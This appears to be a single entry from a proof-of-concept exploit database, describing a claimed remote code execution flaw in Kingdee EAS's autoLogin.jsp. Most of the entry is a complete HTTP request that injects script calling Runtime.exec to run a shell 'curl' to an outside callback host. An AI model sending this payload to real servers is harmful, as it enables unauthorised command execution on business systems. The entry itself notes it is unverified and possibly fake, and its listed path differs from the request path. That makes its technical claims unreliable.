vendor = "金蝶"
name = "金蝶EAS autoLogin.jsp远程代码执行"
type = "RCE"
version = "未知"
path = "/easportal/custom/autologin.jsp"
detail = "POST /easportal/autoLogin.jsp HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Content-Type: application/x-www-form-urlencoded Host: Content-Length: 312 Connection: keep-alive defaultPage=/autoLogin.jsp?defaultPage=/BIReport&json=1);var cc=new Array('/bin/sh', '-c', 'curl http://{{jindie.dns.adysec.com}}/Q12345');java.lang.Runtime.getRuntime().exec(cc);//"
fix = "没验证，看代码poc可能为假"
date = "0703"
label = "0day"
verifier = "sxf"
